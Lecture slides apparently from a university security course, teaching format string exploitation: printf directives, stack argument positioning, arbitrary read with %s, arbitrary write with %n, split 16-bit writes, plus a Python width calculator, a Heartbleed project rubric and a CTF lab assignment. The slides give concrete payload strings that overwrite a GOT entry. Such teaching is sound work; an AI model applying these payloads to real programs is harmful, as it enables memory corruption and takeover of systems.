Format String Vulnerability - 2
Yeongjin Jang, 03/06/18
Format String Vulnerability
• Useful directives
  • %x – print an argument as a hexadecimal value
  • %d – print an argument as a decimal value
  • %p – print an argument as a hexadecimal value with the prefix 0x
  • %s – treat an argument as an address; print the data at that address as a string
  • %n – treat an argument as an address; write the number of bytes printed so far to that address
Format String Syntax
• %1$08d
• %[argument_position]$[length][parameter]
• Meaning
  • Print an integer as a decimal value (d)
  • Justify it to the given length (08)
  • Get the value from the n-th argument (1$)
• Result: print an 8-wide decimal integer (padded with 0) from the value of the 1st argument
Arbitrary Read via FSV
• In format-string-1
• %p %p ….
• Why?
Arbitrary Read via FSV
• The buffer is on the stack
• Your input can also be treated as an argument
• Can you exploit this to perform an arbitrary read via FSV?
[Stack diagram: arg 1 of printf (the format string); 2nd–4th: RESV; 5th: random variable; 6th and up: your input buffer ("%p %p %p %p", 0x4c); then SAVED %ebp and RETURN ADDR]
Arbitrary Read via FSV (%s)
• Put the address to read on the stack
• Suppose the address is 0x804a010 (GOT of printf)
• Prepare the string input
  • "\x10\xa0\x04\x08%7$x" (prints 0x804a010; test it first)
  • "\x10\xa0\x04\x08%7$s" (reads the data!)
• Use struct.unpack("I", …) to change the string to an integer
[Stack diagram: same layout as before; the 7th argument slot holds the start of your input, 0x804a010, followed by "%7$s"; SAVED %ebp and RETURN ADDR above]
Arbitrary Read via FSV (%s)
• Capability
  • Can read "string" data at the address
  • The read terminates when it meets "\x00"
• Tricks to read more…
  • "\x10\xa0\x04\x08\x11\xa0\x04\x08\x12\xa0\x04\x08\x13\xa0\x04\x08"
  • "%7$s|%8$s|%9$s|%10$s"
  • You will get values separated by | (observing || means that it is a null string)
  • E.g., 1|2||3 then the value will be "12\x003"
Arbitrary Write via FSV (%n)
• Put the target address on the stack
• Suppose the address is 0x804a010 (GOT of printf)
• Prepare the string input
  • "\x10\xa0\x04\x08%7$x" (prints 0x804a010; test it first)
  • "\x10\xa0\x04\x08%7$n" (writes the data!)
• Writes 4, because "\x10\xa0\x04\x08" (4 bytes) has been printed before the %7$n directive
[Stack diagram: same layout as before; the 7th argument slot holds 0x804a010 from your input; SAVED %ebp and RETURN ADDR above]
Arbitrary Write via FSV (%n)
• Can you write arbitrary values? Not just 4?
  • %10x – prints 10 characters regardless of the argument's value
  • %10000x – prints 10000 …
  • %1073741824x – prints 2^30 characters …
• How to write 0xfaceb00c?
  • %4207489484x
  • NO….
Arbitrary Write via FSV (%n)
• Challenges…
  • Printing 4 billion characters is super SLOW…
  • Remote attack – you need to download 4 GB…
  • What about 64-bit machines – 48-bit addresses?
• A trick
  • Split the write into multiple writes (2 times, 4 times, etc.)
Arbitrary Write via FSV (%n)
• Writing 0xfaceb00c to 0x804a010
• Prepare two addresses as arguments
  • "\x10\xa0\x04\x08\x12\xa0\x04\x08"
  • Printed 8 bytes
• Write 0xb00c at 0x0804a010 [%(0xb00c - 8)n]
  • This writes 4 bytes, 0x0000b00c, at 0x804a010 ~ 0x804a014
• Write 0xface at 0x804a012 [%(0xface - 0xb00c)n]
  • This writes 4 bytes, 0x0000face, at 0x804a012 ~ 0x804a016
• What about the 0x0000 at 0x804a014 ~ 0x804a016?
  • We do not care…
Arbitrary Write via FSV (%n)
• Can we overwrite 0x12345678?
• Write 0x5678 to the address
  • %(0x5678 - 8)n
• Write 0x1234 to (address + 2)
  • %(0x1234 - 0x5678)n is negative (the counter only grows), so add 0x10000:
  • %(0x011234 - 0x5678)n
• "\x10\xa0\x04\x08\x12\xa0\x04\x08%22128x%7$n%48060x%8$n"
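The two-step %n bookkeeping from the last two slides, modelled as an added Python example (not code from the lecture): it derives the two pad widths the way the slides do, replays the writes, and shows what the "we do not care" bytes at address+4 actually become. The base address is treated as offset 0; the 8 bytes already printed are the two addresses in the payload.

```python
import struct


def split_write_widths(target, printed_so_far):
    """Derive the two pad widths the slides use for a 32-bit target value.

    The low 16 bits are written first at offset 0, the high 16 bits at
    offset 2. Because the %n counter only ever grows, a high half that is
    smaller than the low half is raised by 0x10000 (0x1234 -> 0x011234).
    Returns [(pad_width, offset), ...] in payload order.
    """
    low = target & 0xFFFF
    high = target >> 16
    if high < low:
        high += 0x10000
    return [(low - printed_so_far, 0), (high - low, 2)]


def replay_n_writes(printed_so_far, writes):
    """Replay the %<width>x / %N$n pairs and model the resulting memory.

    Each step prints pad_width characters, then stores the running
    character count as a 4-byte little-endian int at the given offset.
    Returns (memory, final_count) where memory maps offset -> byte value.
    """
    count = printed_so_far
    memory = {}
    for pad_width, offset in writes:
        count += pad_width
        for i, byte in enumerate(struct.pack("<I", count & 0xFFFFFFFF)):
            memory[offset + i] = byte
    return memory, count


def dword_at(memory, offset):
    """Read back the little-endian dword the program would see at offset."""
    raw = bytes(memory.get(offset + i, 0) for i in range(4))
    return struct.unpack("<I", raw)[0]


if __name__ == "__main__":
    # The slide's example: two addresses (8 bytes) printed, then 0x12345678.
    widths = split_write_widths(0x12345678, 8)
    print(widths)                       # [(22128, 0), (48060, 2)]
    mem, count = replay_n_writes(8, widths)
    print(hex(dword_at(mem, 0)))        # 0x12345678: the intended value
    print(hex(count))                   # 0x11234: the second %n stored this
    # Side effect the slide glosses over: offsets 4-5 get the carry byte.
    print(mem[4], mem[5])               # 1 0
```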
Project Presentation
• Evaluation criteria – Heartbleed vulnerability analysis
• What have you learned from the project?
  • OpenSSL, the heartbeat protocol, etc.
  • The vulnerability was there for several years -> such a vuln is hard to detect!
• Can you link what you have learned from the class to the project?
  • Information leak – arbitrary read; could break ASLR, steal a secret value (cookie), etc.
• Demo
• Impact / Implication / Take Away
  • Leaked several private keys from important servers (Yahoo, etc.)
  • A vulnerability in a library is more dangerous because it is used by many apps…
  • Write secure code that checks the size boundary of the buffer
Assignment: Week-8
• Please solve the challenges in the /home/labs/week8 directory
• Some are in VM-CTF1 and some are in VM-CTF3 (ASLR-enabled)
• Get flags from the programs in the challenges directory
• You can attach gdb to these programs, but your exploit must work without attaching gdb.
• Due: 3/16 11:59 am